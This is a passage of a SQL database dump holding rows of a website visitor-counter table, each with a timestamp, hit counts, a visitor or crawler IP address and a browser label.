),(41682,1464807592,1,1,0,0,'180.76.15.17','other'),(41683,1464807814,1,1,0,0,'5.255.253.113','other'),(41684,1464807954,1,1,0,0,'141.8.132.105','other'),(41685,1464808094,1,1,0,0,'130.193.50.34','other'),(41686,1464808261,2,2,0,0,'130.193.51.83','other'),(41687,1464808349,1,1,0,0,'130.193.51.19','other'),(41688,1464809714,1,0,1,0,'66.249.78.143',''),(41689,1464810945,1,1,0,0,'141.8.132.105','other'),(41690,1464812121,1,1,0,0,'91.196.178.72','chrome'),(41691,1464812214,1,1,0,0,'141.8.132.105','other'),(41692,1464812809,1,1,0,0,'176.8.227.43','firefox'),(41693,1464813985,1,1,0,0,'82.145.219.19','other'),(41694,1464814800,2,2,0,0,'130.193.50.34','other'),(41695,1464815839,1,1,0,0,'130.193.50.34','other'),(41696,1464817379,1,0,1,0,'68.180.231.49',''),(41697,1464817545,1,0,1,0,'66.249.78.143',''),(41698,1464820328,1,1,0,0,'66.249.78.143','chrome'),(41699,1464820386,1,1,0,0,'66.249.78.178','chrome'),(41700,1464822614,1,1,0,0,'130.193.50.34','other'),(41701,1464822645,1,0,1,0,'66.249.78.164',''),(41702,1464823344,2,2,0,0,'5.255.253.113','other'),(41703,1464825052,1,1,0,0,'66.249.78.164','chrome'),(41704,1464825990,1,0,1,0,'66.249.78.143',''),(41705,1464827256,1,0,1,0,'66.249.66.185',''),(41706,1464827622,1,1,0,0,'141.8.132.105','other'),(41707,1464828196,1,1,0,0,'141.8.142.58','other'),(41708,1464828287,1,0,1,0,'66.249.78.164',''),(41709,1464828627,1,1,0,0,'5.255.253.113','other'),(41710,1464828765,1,1,0,0,'141.8.132.105','other'),(41711,1464830035,1,1,0,0,'141.8.183.25','other'),(41712,1464830441,1,1,0,0,'66.249.78.150','chrome'),(41713,1464831103,1,1,0,0,'5.255.253.113','other'),(41715,1464832399,1,0,1,0,'66.249.78.171',''),(41716,1464836027,1,1,0,0,'5.255.253.113','other'),(41717,1464837310,1,1,0,0,'141.8.132.105','other'),(41718,1464838631,1,0,1,0,'66.249.66.182',''),(41719,1464840011,9,9,0,0,'209.126.127.49','other'),(41720,1464840864,1,0,1,0,'66.249.78.178',''),(41721,1464841010,1,1,0,0,'130.193.51.83','other'),(41722,1464841136,1,1,0,0,'130.193.50.34','other'),(41723,1464844270,1,1,0,0,'157.55.39.3','other'),(41724,1464844815,1,1,0,0,'91.196.178.135','firefox'),(41725,1464845619,1,1,0,0,'178.154.189.202','other'),(41726,1464845745,1,0,1,0,'66.249.78.171',''),(41727,1464847460,1,1,0,0,'52.3.105.23','other'),(41728,1464848066,1,1,0,0,'66.249.93.150','chrome'),(41729,1464848648,1,1,0,0,'91.196.178.69','firefox'),(41730,1464849245,1,1,0,0,'130.193.51.19','other'),(41731,1464849359,1,1,0,0,'62.122.207.77','chrome'),(41732,1464850604,1,1,0,0,'37.53.90.175','chrome'),(41733,1464850673,1,1,0,0,'91.196.178.162','firefox'),(41734,1464851380,1,1,0,0,'91.196.178.69','firefox'),(41735,1464851499,1,1,0,0,'91.124.238.64','chrome'),(41736,1464851766,2,2,0,0,'94.179.87.22','firefox'),(41737,1464853115,1,1,0,0,'52.3.105.23','other'),(41738,1464853428,1,1,0,0,'93.73.51.175','firefox'),(41739,1464853516,1,1,0,0,'94.179.87.22','chrome'),(41740,1464853983,1,1,0,0,'91.196.178.69','firefox'),(41741,1464854070,1,1,0,0,'95.215.223.233','chrome'),(41742,1464854397,1,1,0,0,'95.133.197.45','chrome'),(41743,1464854578,1,1,0,0,'91.219.144.98','firefox'),(41744,1464855868,1,1,0,0,'91.196.178.70','chrome'),(41745,1464855991,1,1,0,0,'91.196.178.69','firefox'),(41746,1464857480,1,1,0,0,'91.196.176.13','chrome'),(41747,1464857566,1,1,0,0,'87.238.152.68','chrome'),(41748,1464857638,1,1,0,0,'95.213.6.35','other'),(41749,1464857849,1,1,0,0,'5.255.253.113','other'),(41750,1464858289,1,1,0,0,'46.201.179.88','opera'),(41751,1464858834,1,1,0,0,'94.179.18.100','firefox'),(41752,1464859494,1,1,0,0,'91.196.178.67','firefox'),(41753,1464860733,1,1,0,0,'178.154.189.202','other'),(41754,1464862559,1,0,1,0,'66.249.78.171',''),(41755,1464864193,1,1,0,0,'91.196.178.35','firefox'),(41756,1464864270,1,1,0,0,'66.249.78.178','chrome'),(41757,1464864582,1,1,0,0,'91.196.178.165','chrome'),(41758,1464864952,1,1,0,0,'176.195.25.41','chrome'),(41759,1464864953,1,1,0,0,'178.140.195.224','chrome'),(41760,1464864954,1,1,0,0,'128.68.222.8','chrome'),(41761,1464864955,1,1,0,0,'176.193.98.244','msie'),(41762,1464864957,1,1,0,0,'176.193.206.15','msie'),(41763,1464866555,1,1,0,0,'136.243.5.87','other'),(41764,1464866916,1,1,0,0,'94.179.126.133','opera'),(41765,1464868059,3,3,0,0,'144.76.93.46','other'),(41766,1464868615,1,1,0,0,'157.55.39.34','other'),(41767,1464869598,1,1,0,0,'91.196.178.69','firefox'),(41768,1464869867,6,6,0,0,'46.9.164.175','other'),(41769,1464871711,1,0,1,0,'66.249.78.143',''),(41770,1464871972,1,1,0,0,'94.179.93.119','chrome'),(41771,1464872216,1,1,0,0,'178.95.246.153','chrome'),(41772,1464872280,1,1,0,0,'130.193.50.34','other'),(41773,1464872283,4,4,0,0,'51.255.48.155','other'),(41774,1464872446,1,1,0,0,'91.196.178.66','chrome'),(41775,1464873421,2,2,0,0,'194.1.195.225','firefox'),(41776,1464874232,2,2,0,0,'141.8.183.25','other'),(41777,1464874367,1,1,0,0,'130.193.50.34','other'),(41778,1464874735,1,1,0,0,'93.158.152.61','other'),(41779,1464875082,1,1,0,0,'141.8.142.61','other'),(41780,1464875349,2,2,0,0,'95.132.101.105','chrome'),(41781,1464875926,1,1,0,0,'91.196.178.35','firefox'),(41782,1464876468,1,1,0,0,'91.196.178.68','firefox'),(41783,1464877625,1,1,0,0,'94.231.188.58','firefox'),(41784,1464877981,1,1,0,0,'180.76.15.158','other'),(41785,1464878201,1,1,0,0,'128.69.224.138','opera'),(41786,1464878202,1,1,0,0,'176.195.46.248','chrome'),(41787,1464878322,1,1,0,0,'78.111.189.11','chrome'),(41788,1464878943,1,0,1,0,'66.249.78.164',''),(41789,1464880357,1,1,0,0,'78.111.189.11','chrome'),(41790,1464880426,1,0,1,0,'66.249.78.150',''),(41791,1464880624,1,1,0,0,'188.166.33.226','other'),(41792,1464881313,1,1,0,0,'78.111.189.11','chrome'),(41793,1464881703,1,1,0,0,'178.154.189.203','other'),(41794,1464882410,1,1,0,0,'78.111.189.11','chrome'),(41795,1464882809,1,1,0,0,'130.193.50.34','other'),(41796,1464882919,1,1,0,0,'94.179.58.56','chrome'),(41797,1464884387,1,1,0,0,'78.111.189.11','chrome'),(41798,1464884760,1,0,1,0,'66.249.78.150',''),(41799,1464885462,1,0,1,0,'66.249.78.136',''),(41800,1464885692,1,1,0,0,'78.111.189.11','chrome'),(41801,1464887336,1,0,1,0,'66.249.78.150',''),(41802,1464888097,1,1,0,0,'94.179.246.43','firefox'),(41803,1464889196,1,1,0,0,'91.196.178.35','chrome'),(41804,1464889236,1,0,1,0,'66.249.78.143',''),(41805,1464890651,4,4,0,0,'174.34.135.242','other'),(41806,1464890702,1,1,0,0,'193.194.127.217','firefox'),(41807,1464890853,1,1,0,0,'130.193.50.34','other'),(41808,1464891133,1,1,0,0,'141.8.183.25','other'),(41809,1464891420,1,1,0,0,'141.8.132.105','other'),(41810,1464892089,1,0,1,0,'66.249.66.177',''),(41811,1464892339,1,1,0,0,'92.113.168.39','opera'),(41812,1464896581,1,0,1,0,'66.249.78.171',''),(41813,1464896603,1,0,1,0,'66.249.78.150',''),(41814,1464897188,1,0,1,0,'66.249.78.164',''),(41815,1464898790,1,1,0,0,'93.75.2.233','firefox'),(41816,1464898995,1,0,1,0,'66.249.78.178',''),(41817,1464899773,1,1,0,0,'141.8.132.105','other'),(41818,1464900399,1,1,0,0,'130.193.50.34','other'),(41819,1464900911,1,1,0,0,'78.111.189.44','chrome'),(41820,1464902016,1,0,1,0,'66.249.78.178',''),(41821,1464902583,1,0,1,0,'66.249.78.164',''),(41822,1464903296,1,0,1,0,'66.249.78.150',''),(41823,1464903999,1,0,1,0,'66.249.66.185',''),(41824,1464905092,1,1,0,0,'66.249.66.188','chrome'),(41825,1464905185,1,1,0,0,'141.8.142.58','other'),(41826,1464905289,1,1,0,0,'130.193.51.79','other'),(41827,1464905401,2,2,0,0,'5.9.123.116','other'),(41828,1464905416,1,1,0,0,'141.8.132.105','other'),(41829,1464906345,1,1,0,0,'180.76.15.159','other'),(41830,1464907450,1,0,1,0,'66.249.78.171',''),(41831,1464910345,1,0,1,0,'66.249.78.171',''),(41832,1464910996,1,0,1,0,'66.249.78.143',''),(41833,1464912734,1,0,1,0,'66.249.78.178',''),(41834,1464913844,1,1,0,0,'66.249.78.150','chrome'),(41835,1464913852,1,1,0,0,'66.249.78.164','chrome'),(41836,1464915196,1,0,1,0,'66.249.78.143',''),(41837,1464916404,1,0,1,0,'66.249.78.178',''),(41838,1464916973,1,1,0,0,'130.193.51.83','other'),(41839,1464917305,2,0,2,0,'66.249.78.164',''),(41840,1464917504,1,0,1,0,'66.249.78.171',''),(41841,1464920653,1,1,0,0,'141.8.142.58','other'),(41842,1464920795,1,1,0,0,'130.193.51.19','other'),(41843,1464921524,1,1,0,0,'141.8.142.61','other'),(41844,1464923455,1,0,1,0,'66.249.78.143',''),(41845,1464923564,1,1,0,0,'130.193.50.34','other'),(41846,1464925342,1,0,1,0,'66.249.78.171',''),(41847,1464926422,1,0,1,0,'66.249.78.143',''),(41848,1464928139,1,1,0,0,'141.8.132.105','other'),(41849,1464928538,1,1,0,0,'207.46.13.154','other'),(41850,1464929256,1,1,0,0,'91.196.178.70','chrome'),(41851,1464929692,1,0,1,0,'66.249.78.178',''),(41852,1464930265,1,1,0,0,'130.193.50.34','other'),(41853,1464930471,1,1,0,0,'141.8.183.25','other'),(41854,1464930517,2,0,2,0,'66.249.78.164',''),(41855,1464931703,1,1,0,0,'91.196.178.135','firefox'),(41856,1464932595,1,1,0,0,'95.135.212.27','chrome'),(41857,1464932656,1,0,1,0,'66.249.78.136',''),(41858,1464932891,1,1,0,0,'66.249.93.147','chrome'),(41859,1464933824,3,3,0,0,'130.193.50.34','other'),(41860,1464933962,1,1,0,0,'141.8.183.25','other'),(41861,1464934136,2,2,0,0,'141.8.132.105','other'),(41862,1464934207,1,1,0,0,'95.133.3.238','chrome'),(41863,1464935306,1,0,1,0,'66.249.66.177',''),(41864,1464937652,1,1,0,0,'207.46.13.46','other'),(41865,1464938256,1,1,0,0,'207.46.13.154','other'),(41866,1464938271,1,1,0,0,'193.93.228.47','chrome'),(41867,1464938565,1,1,0,0,'91.196.178.162','firefox'),(41868,1464938598,1,1,0,0,'130.193.51.83','other'),(41869,1464938887,2,2,0,0,'46.201.239.218','firefox'),(41870,1464939106,1,1,0,0,'31.128.100.166','chrome'),(41871,1464939466,1,1,0,0,'91.196.178.71','chrome'),(41872,1464939496,1,1,0,0,'141.8.183.25','other'),(41873,1464939867,1,0,1,0,'66.249.78.150',''),(41874,1464941402,1,1,0,0,'94.179.71.14','firefox'),(41875,1464941782,1,1,0,0,'95.133.3.238','chrome'),(41876,1464941931,1,1,0,0,'82.207.91.234','firefox'),(41877,1464941938,1,1,0,0,'5.255.253.113','other'),(41878,1464942041,1,1,0,0,'78.111.189.12','chrome'),(41879,1464942954,2,0,2,0,'66.249.66.180',''),(41880,1464943067,1,1,0,0,'95.133.197.45','chrome'),(41881,1464943609,1,1,0,0,'91.196.178.69','firefox'),(41882,1464944491,1,1,0,0,'91.196.178.72','firefox'),(41883,1464945158,1,1,0,0,'81.163.123.205','firefox'),(41884,1464945166,1,1,0,0,'95.133.3.238','chrome'),(41885,1464945292,1,0,1,0,'66.249.66.183',''),(41886,1464945415,1,1,0,0,'178.123.32.124','firefox'),(41887,1464945709,1,0,1,0,'66.249.78.171',''),(41888,1464945831,1,1,0,0,'130.193.50.34','other'),(41889,1464946728,2,2,0,0,'78.111.189.12','chrome'),(41890,1464947458,1,0,1,0,'66.249.78.164',''),(41891,1464947548,1,1,0,0,'91.196.178.69','firefox'),(41892,1464947746,1,0,1,0,'66.249.78.178',''),(41893,1464947831,1,1,0,0,'37.53.230.106','firefox'),(41894,1464947954,1,0,1,0,'66.249.66.180',''),(41895,1464948656,1,1,0,0,'130.193.50.34','other'),(41896,1464948796,1,0,1,0,'66.249.78.164',''),(41897,1464948812,1,0,1,0,'66.249.78.171',''),(41898,1464949294,1,0,1,0,'66.249.78.150',''),(41899,1464949776,1,1,0,0,'178.154.189.202','other'),(41900,1464950065,1,1,0,0,'109.104.190.145','chrome'),(41901,1464950112,1,1,0,0,'91.196.178.165','chrome'),(41902,1464952267,1,0,1,0,'66.249.66.183',''),(41903,1464952415,1,1,0,0,'82.207.87.100','firefox'),(41904,1464952512,2,0,2,0,'66.249.78.136',''),(41905,1464952530,1,0,1,0,'66.249.78.164',''),(41906,1464952937,1,1,0,0,'94.231.188.10','firefox'),(41907,1464953060,1,0,1,0,'66.249.78.178',''),(41908,1464954021,1,0,1,0,'66.249.78.171',''),(41909,1464954315,1,1,0,0,'130.193.50.34','other'),(41910,1464954459,1,0,1,0,'66.249.78.143',''),(41911,1464954705,1,1,0,0,'178.93.148.174','chrome'),(41912,1464955328,1,0,1,0,'66.249.78.178',''),(41913,1464955392,3,0,3,0,'66.249.78.171',''),(41914,1464955564,1,0,1,0,'66.249.78.143',''),(41915,1464955783,1,1,0,0,'94.231.188.10','firefox'),(41916,1464955884,2,2,0,0,'82.144.197.84','opera'),(41917,1464955979,2,2,0,0,'130.193.50.34','other'),(41918,1464956194,1,1,0,0,'91.196.178.69','firefox'),(41919,1464956318,2,0,2,0,'66.249.78.178',''),(41920,1464956678,1,1,0,0,'95.133.3.238','chrome'),(41921,1464956706,1,1,0,0,'193.200.212.197','chrome'),(41922,1464956781,1,0,1,0,'66.249.66.188',''),(41923,1464957001,1,0,1,0,'68.180.231.49',''),(41924,1464957026,1,1,0,0,'207.46.13.154','other'),(41925,1464957032,1,1,0,0,'141.8.183.19','other'),(41926,1464957216,1,1,0,0,'130.193.50.34','other'),(41927,1464957240,1,0,1,0,'66.249.78.164',''),(41928,1464957378,2,2,0,0,'141.8.132.105','other'),(41929,1464957711,2,2,0,0,'5.255.253.113','other'),(41930,1464957980,1,1,0,0,'91.196.178.135','firefox'),(41931,1464958300,1,1,0,0,'130.193.50.34','other'),(41932,1464958701,2,0,2,0,'66.249.78.171',''),(41933,1464958790,1,1,0,0,'141.8.142.58','other'),(41934,1464958807,1,0,1,0,'66.249.78.136',''),(41935,1464958887,1,0,1,0,'66.249.78.178',''),(41936,1464959094,1,1,0,0,'91.196.178.69','firefox'),(41937,1464959174,1,1,0,0,'37.53.230.106','firefox'),(41938,1464959401,3,3,0,0,'130.193.50.34','other'),(41939,1464960149,2,0,2,0,'66.249.78.164',''),(41940,1464960196,1,1,0,0,'141.8.142.58','other'),(41941,1464960320,1,1,0,0,'141.8.183.25','other'),(41942,1464960627,1,0,1,0,'66.249.78.150',''),(41943,1464960699,2,2,0,0,'130.193.50.34','other'),(41944,1464960980,1,1,0,0,'180.76.15.16','other'),(41945,1464961065,1,0,1,0,'66.249.78.164',''),(41946,1464961226,3,3,0,0,'141.8.183.25','other'),(41947,1464961274,1,0,1,0,'66.249.78.171',''),(41948,1464961340,23,23,0,0,'51.254.143.24','other'),(41949,1464961514,1,0,1,0,'66.249.78.136',''),(41950,1464962539,1,0,1,0,'66.249.78.164',''),(41951,1464962904,1,1,0,0,'94.179.246.43','firefox'),(41952,1464962957,1,1,0,0,'130.193.50.34','other'),(41953,1464963060,1,1,0,0,'93.158.152.84','other'),(41954,1464963241,1,1,0,0,'5.255.253.68','other'),(41955,1464963417,1,1,0,0,'141.8.142.25','other'),(41956,1464963695,1,1,0,0,'141.8.183.19','other'),(41957,1464964009,1,1,0,0,'178.154.189.201','other'),(41958,1464964183,1,1,0,0,'78.154.176.4','firefox'),(41959,1464964202,1,1,0,0,'130.193.51.19','other'),(41960,1464964969,1,1,0,0,'141.8.142.61','other'),(41961,1464965009,2,0,2,0,'66.249.78.164',''),(41962,1464965059,1,0,1,0,'66.249.78.171',''),(41963,1464965088,1,1,0,0,'130.193.50.34','other'),(41964,1464965219,2,2,0,0,'130.193.51.19','other'),(41965,1464965304,1,1,0,0,'141.0.15.221','other'),(41966,1464965718,1,1,0,0,'91.196.178.164','chrome'),(41967,1464966000,1,1,0,0,'141.8.142.58','other'),(41968,1464966205,1,1,0,0,'141.8.183.25','other'),(41969,1464966733,1,0,1,0,'66.249.78.164',''),(41970,1464966795,2,0,2,0,'66.249.78.171',''),(41971,1464967530,2,2,0,0,'141.8.142.58','other'),(41972,1464967643,1,1,0,0,'130.193.50.34','other'),(41973,1464967836,1,1,0,0,'94.179.246.43','firefox'),(41974,1464968744,1,0,1,0,'66.249.78.150',''),(41975,1464969084,2,0,2,0,'66.249.78.178',''),(41976,1464969523,1,0,1,0,'66.249.78.171',''),(41977,1464971003,1,1,0,0,'178.154.189.31','other'),(41978,1464971069,1,0,1,0,'66.249.78.171',''),(41979,1464971147,1,1,0,0,'141.8.142.58','other'),(41980,1464971226,1,1,0,0,'130.193.51.19','other'),(41981,1464971311,1,1,0,0,'130.193.51.79','other'),(41982,1464971404,1,1,0,0,'93.158.152.84','other'),(41983,1464971421,1,0,1,0,'66.249.78.136',''),(41984,1464971464,1,0,1,0,'66.249.78.178',''),(41985,1464971573,1,1,0,0,'130.193.50.34','other'),(41986,1464973607,1,0,1,0,'66.249.78.178',''),(41987,1464973663,1,0,1,0,'66.249.66.180',''),(41988,1464974051,1,1,0,0,'94.179.246.43','firefox'),(41989,1464975483,1,0,1,0,'66.249.66.177',''),(41990,1464975635,1,0,1,0,'66.249.78.178',''),(41991,1464975712,1,0,1,0,'66.249.66.180',''),(41992,1464976753,1,1,0,0,'141.8.183.25','other'),(41993,1464977511,1,0,1,0,'66.249.78.171',''),(41994,1464977628,1,0,1,0,'66.249.78.136',''),(41995,1464977656,1,0,1,0,'66.249.78.178',''),(41996,1464978498,1,1,0,0,'91.196.178.69','firefox'),(41997,1464978665,1,0,1,0,'66.249.78.164',''),(41998,1464979582,2,0,2,0,'66.249.78.178',''),(41999,1464979722,1,1,0,0,'94.179.246.43','firefox'),(42000,1464980201,1,0,1,0,'66.249.78.164',''),(42001,1464980282,1,0,1,0,'66.249.78.171',''),(42002,1464980371,1,0,1,0,'66.249.66.177',''),(42003,1464980540,2,2,0,0,'141.8.142.58','other'),(42004,1464980665,1,1,0,0,'141.8.183.25','other'),(42005,1464981422,1,0,1,0,'66.249.78.150',''),(42006,1464981431,1,0,1,0,'66.249.78.136',''),(42007,1464984165,1,0,1,0,'66.249.78.150',''),(42008,1464984359,1,0,1,0,'66.249.78.164',''),(42009,1464984887,1,0,1,0,'66.249.78.143',''),(42010,1464985140,1,0,1,0,'66.249.78.171',''),(42011,1464985341,2,0,2,0,'66.249.78.178',''),(42012,1464985602,1,0,1,0,'66.249.78.164',''),(42013,1464985816,1,0,1,0,'66.249.66.185',''),(42014,1464987512,1,0,1,0,'66.249.78.164',''),(42015,1464987907,1,1,0,0,'141.8.142.67','other'),(42016,1464988635,1,0,1,0,'66.249.78.171',''),(42017,1464988659,1,0,1,0,'66.249.66.185',''),(42018,1464988799,1,0,1,0,'66.249.66.183',''),(42019,1464989588,1,0,1,0,'66.249.78.171',''),(42020,1464990495,3,3,0,0,'130.193.50.34','other'),(42021,1464990671,1,0,1,0,'66.249.66.183',''),(42022,1464991236,1,0,1,0,'66.249.78.178',''),(42023,1464992330,3,0,3,0,'66.249.78.171',''),(42024,1464993016,2,0,2,0,'66.249.78.164',''),(42025,1464993777,1,1,0,0,'178.154.189.203','other'),(42026,1464995137,1,1,0,0,'130.193.51.19','other'),(42027,1464995355,1,0,1,0,'66.249.78.143',''),(42028,1464995936,3,0,3,0,'66.249.78.164',''),(42029,1464997057,1,0,1,0,'66.249.78.164',''),(42030,1464997706,1,0,1,0,'66.249.66.185',''),(42031,1464998030,1,0,1,0,'66.249.78.178',''),(42032,1464998121,1,1,0,0,'141.8.183.19','other'),(42033,1464998245,1,1,0,0,'141.8.142.61','other'),(42034,1464998916,1,0,1,0,'66.249.66.177',''),(42035,1464999600,1,0,1,0,'66.249.78.143',''),(42036,1465000052,1,0,1,0,'66.249.78.164',''),(42037,1465001841,1,0,1,0,'66.249.66.180',''),(42038,1465002461,2,0,2,0,'66.249.78.150',''),(42039,1465002510,1,0,1,0,'66.249.78.171',''),(42040,1465002645,1,1,0,0,'130.193.51.19','other'),(42041,1465002741,5,5,0,0,'193.254.238.25','chrome'),(42042,1465002771,1,1,0,0,'141.8.142.58','other'),(42043,1465002931,1,1,0,0,'141.8.142.61','other'),(42044,1465003963,1,0,1,0,'66.249.66.183',''),(42045,1465004798,2,0,2,0,'66.249.78.164',''),(42046,1465006335,1,1,0,0,'5.255.253.67','other'),(42047,1465006382,1,0,1,0,'66.249.78.178',''),(42048,1465006540,1,1,0,0,'93.158.152.61','other'),(42049,1465006699,1,1,0,0,'130.193.51.79','other'),(42050,1465006812,1,1,0,0,'141.8.142.61','other'),(42051,1465007258,2,2,0,0,'130.193.51.19','other'),(42052,1465007338,3,0,3,0,'66.249.78.164',''),(42053,1465007387,1,1,0,0,'141.8.142.58','other'),(42054,1465008907,1,0,1,0,'66.249.78.171',''),(42055,1465008992,1,1,0,0,'82.145.208.172','other'),(42056,1465009133,1,0,1,0,'66.249.78.164',''),(42057,1465009296,1,0,1,0,'66.249.78.178',''),(42058,1465009298,1,0,1,0,'66.249.78.150',''),(42059,1465009555,1,0,1,0,'66.249.66.177',''),(42060,1465010256,1,0,1,0,'66.249.78.178',''),(42061,1465010357,1,0,1,0,'66.249.78.164',''),(42062,1465011216,1,0,1,0,'66.249.78.171',''),(42063,1465011271,1,0,1,0,'66.249.78.150',''),(42064,1465011866,1,0,1,0,'66.249.78.178',''),(42065,1465012116,1,0,1,0,'66.249.78.136',''),(42066,1465012545,1,0,1,0,'66.249.78.164',''),(42067,1465012803,1,1,0,0,'130.193.50.34','other'),(42068,1465013729,1,0,1,0,'66.249.78.136',''),(42069,1465014093,1,1,0,0,'141.8.142.61','other'),(42070,1465015759,1,0,1,0,'66.249.78.171',''),(42071,1465016453,1,0,1,0,'66.249.78.178',''),(42072,1465017131,2,2,0,0,'141.8.183.25','other'),(42073,1465017284,1,1,0,0,'141.8.142.58','other'),(42074,1465017372,1,1,0,0,'157.55.39.20','other'),(42075,1465017813,1,0,1,0,'66.249.78.150',''),(42076,1465018329,1,0,1,0,'66.249.78.178',''),(42077,1465018416,2,2,0,0,'130.193.51.19','other'),(42078,1465018682,1,1,0,0,'130.193.50.34','other'),(42079,1465019027,1,1,0,0,'141.8.183.25','other'),(42080,1465019116,2,0,2,0,'66.249.78.164',''),(42081,1465019386,1,1,0,0,'141.8.142.67','other'),(42082,1465019703,3,3,0,0,'62.210.143.245','other'),(42083,1465019887,1,0,1,0,'66.249.78.171',''),(42084,1465019918,1,1,0,0,'78.111.176.169','chrome'),(42085,1465019930,1,0,1,0,'66.249.66.177',''),(42086,1465020036,1,0,1,0,'66.249.66.180',''),(42087,1465020622,2,0,2,0,'66.249.78.178',''),(42088,1465020639,1,0,1,0,'66.249.78.150',''),(42089,1465020901,1,1,0,0,'141.8.142.61','other'),(42090,1465020978,2,0,2,0,'66.249.78.143',''),(42091,1465021014,1,0,1,0,'66.249.78.164',''),(42092,1465021029,4,4,0,0,'195.154.187.115','other'),(42093,1465021252,1,1,0,0,'136.243.152.18','other'),(42094,1465021307,1,1,0,0,'141.8.183.25','other'),(42095,1465021697,5,5,0,0,'178.24.113.244','other'),(42096,1465022238,1,0,1,0,'66.249.78.150',''),(42097,1465022901,1,0,1,0,'66.249.66.180',''),(42098,1465022944,1,0,1,0,'66.249.78.178',''),(42099,1465023010,1,1,0,0,'188.40.95.70','other'),(42100,1465023411,1,1,0,0,'91.196.178.135','firefox'),(42101,1465023438,1,0,1,0,'66.249.78.171',''),(42102,1465023793,2,0,2,0,'66.249.66.183',''),(42103,1465024278,1,0,1,0,'66.249.66.182',''),(42104,1465025641,1,0,1,0,'66.249.66.177',''),(42105,1465026324,1,1,0,0,'94.179.246.43','firefox'),(42106,1465026608,3,3,0,0,'212.83.177.193','other'),(42107,1465027070,1,0,1,0,'66.249.78.164',''),(42108,1465027134,1,1,0,0,'66.249.93.150','chrome'),(42109,1465027917,3,0,3,0,'66.249.66.177',''),(42110,1465028427,2,0,2,0,'66.249.66.182',''),(42111,1465028745,3,3,0,0,'5.9.62.130','other'),(42112,1465029170,1,0,1,0,'66.249.78.178',''),(42113,1465029207,1,0,1,0,'66.249.78.164',''),(42114,1465029574,4,4,0,0,'188.40.95.70','other'),(42115,1465029623,1,0,1,0,'66.249.78.143',''),(42116,1465029772,1,0,1,0,'66.249.66.180',''),(42117,1465029869,1,0,1,0,'66.249.78.171',''),(42118,1465030696,2,0,2,0,'66.249.78.178',''),(42119,1465032013,1,0,1,0,'66.249.78.178',''),(42120,1465032342,2,0,2,0,'66.249.78.171',''),(42121,1465032947,4,0,4,0,'66.249.78.164',''),(42122,1465033019,2,0,2,0,'66.249.78.150',''),(42123,1465033678,1,0,1,0,'66.249.66.180',''),(42124,1465034171,1,0,1,0,'66.249.78.171',''),(42125,1465034290,1,0,1,0,'66.249.78.164',''),(42126,1465035862,1,0,1,0,'66.249.78.164',''),(42127,1465036224,1,0,1,0,'66.249.78.143',''),(42128,1465037059,1,0,1,0,'66.249.78.164','');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (42129,1465037226,1,0,1,0,'66.249.78.178',''),(42130,1465037683,1,1,0,0,'178.95.244.95','chrome'),(42131,1465037706,1,1,0,0,'141.8.142.58','other'),(42132,1465037747,2,0,2,0,'66.249.66.183',''),(42133,1465038016,2,0,2,0,'66.249.78.164',''),(42134,1465038988,1,1,0,0,'202.46.58.51','other'),(42135,1465039540,2,0,2,0,'66.249.78.164',''),(42136,1465041894,1,0,1,0,'66.249.78.143',''),(42137,1465042333,1,0,1,0,'66.249.78.136',''),(42138,1465042807,2,0,2,0,'66.249.78.178',''),(42139,1465042919,1,0,1,0,'66.249.66.180',''),(42140,1465043249,1,0,1,0,'66.249.78.164',''),(42141,1465043335,1,0,1,0,'66.249.78.143',''),(42142,1465044591,1,0,1,0,'66.249.78.178',''),(42143,1465044687,1,1,0,0,'207.46.13.46','other'),(42144,1465045562,3,0,3,0,'66.249.78.164',''),(42145,1465045827,1,1,0,0,'95.158.4.74','chrome'),(42146,1465046050,1,0,1,0,'66.249.78.171',''),(42147,1465046458,1,0,1,0,'66.249.78.150',''),(42148,1465047050,1,0,1,0,'66.249.78.178',''),(42149,1465047085,1,1,0,0,'95.133.197.45','chrome'),(42150,1465048187,1,0,1,0,'66.249.78.171',''),(42151,1465048676,1,0,1,0,'66.249.78.164',''),(42152,1465048736,1,0,1,0,'66.249.78.178',''),(42153,1465048778,1,0,1,0,'66.249.78.143',''),(42154,1465049277,1,0,1,0,'66.249.78.136',''),(42155,1465049911,1,0,1,0,'66.249.78.178',''),(42156,1465049921,1,0,1,0,'66.249.66.177',''),(42157,1465049958,1,1,0,0,'178.154.189.203','other'),(42158,1465050510,1,0,1,0,'66.249.78.136',''),(42159,1465050522,1,1,0,0,'178.154.189.202','other'),(42160,1465050842,3,0,3,0,'66.249.78.171',''),(42161,1465051200,1,1,0,0,'69.30.221.242','other'),(42162,1465051491,1,0,1,0,'66.249.66.177',''),(42163,1465051761,1,0,1,0,'66.249.78.171',''),(42164,1465052496,2,0,2,0,'66.249.78.178',''),(42165,1465052515,1,0,1,0,'66.249.78.164',''),(42166,1465052530,1,0,1,0,'66.249.78.136',''),(42167,1465052855,1,1,0,0,'204.79.180.108','msie'),(42168,1465053135,1,0,1,0,'66.249.78.171',''),(42169,1465053507,1,0,1,0,'66.249.78.164',''),(42170,1465054633,1,0,1,0,'66.249.78.136',''),(42171,1465054922,1,0,1,0,'66.249.78.171',''),(42172,1465055219,1,0,1,0,'66.249.66.180',''),(42173,1465055976,1,0,1,0,'66.249.78.171',''),(42174,1465056053,2,0,2,0,'66.249.78.178',''),(42175,1465056155,1,1,0,0,'94.179.246.43','firefox'),(42176,1465056266,3,3,0,0,'66.249.78.171','chrome'),(42177,1465056336,1,1,0,0,'66.249.78.164','chrome'),(42178,1465057407,1,0,1,0,'66.249.78.164',''),(42179,1465057485,1,0,1,0,'66.249.78.143',''),(42180,1465058174,2,0,2,0,'66.249.78.150',''),(42181,1465059335,1,0,1,0,'66.249.78.171',''),(42182,1465060213,2,0,2,0,'66.249.78.164',''),(42183,1465060287,2,0,2,0,'66.249.78.178',''),(42184,1465061232,2,2,0,0,'85.17.112.142','other'),(42185,1465061284,1,0,1,0,'66.249.78.143',''),(42186,1465061625,1,0,1,0,'66.249.66.177',''),(42187,1465061979,2,0,2,0,'66.249.66.183',''),(42188,1465062451,1,1,0,0,'66.249.78.136','chrome'),(42189,1465062468,1,1,0,0,'91.196.178.168','firefox'),(42190,1465062590,1,1,0,0,'66.249.78.171','chrome'),(42191,1465063879,1,0,1,0,'66.249.78.150',''),(42192,1465064118,1,0,1,0,'66.249.78.164',''),(42193,1465064241,1,0,1,0,'66.249.66.177',''),(42194,1465064736,9,0,9,0,'68.180.229.171',''),(42195,1465065116,1,0,1,0,'66.249.78.164',''),(42196,1465065276,1,0,1,0,'66.249.78.178',''),(42197,1465065417,1,1,0,0,'94.179.17.243','firefox'),(42198,1465065545,1,1,0,0,'130.193.50.34','other'),(421